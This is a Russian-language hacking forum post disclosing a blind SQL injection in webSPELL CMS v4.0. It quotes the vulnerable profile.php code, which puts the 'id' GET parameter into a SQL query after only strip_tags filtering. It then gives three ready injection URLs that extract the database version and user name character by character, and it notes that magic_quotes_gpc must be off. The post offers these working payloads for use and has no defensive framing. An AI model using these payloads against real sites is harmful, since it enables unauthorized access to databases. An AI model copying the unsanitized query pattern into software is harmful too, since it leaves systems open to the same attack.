Показать сообщение отдельно

  #192  
Старый 13.11.2009, 04:09
Ins3t
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691

Репутация: 330
По умолчанию

webSPELL CMS v4.0 Blind SQL injection

Уязвимость затаилась в скрипте профиля (profile.php):

PHP код:
...
if(
$_GET['id']) {
$id strip_tags($_GET['id']);

//profil: buddys
if($_GET['action'] == "buddys") {

eval (
"\$title_profile = \"".gettemplate("title_profile")."\";");
echo 
$title_profile;

$buddys=safe_query("SELECT buddy FROM ".PREFIX."buddys WHERE userID='$id'");
... 
Единственной попыткой защитить свое "детище" программисты сделали фильтрацию пережаваемого ГОТом значния с помощю функции strip_tags(), которая как известно удаляет HTML и PHP теги из строки.

Реализация:

Код:
http://localhost/1/index.php?site=profile&id=1'+and+substring(version(),1,1)=5+and+'1'='1
Код:
http://localhost/1/index.php?site=profile&id=1'+and+ascii(lower(substring(user(),1,1)))=114+and+'1'='1
Код:
http://localhost/1/index.php?site=profile&id=1'+and+ascii(lower(substring(user(),2,1)))=111+and+'1'='1
И так далее.

Для удачной эксплаьации magic_quotes_gpc должно быть в положении off
 
Ответить с цитированием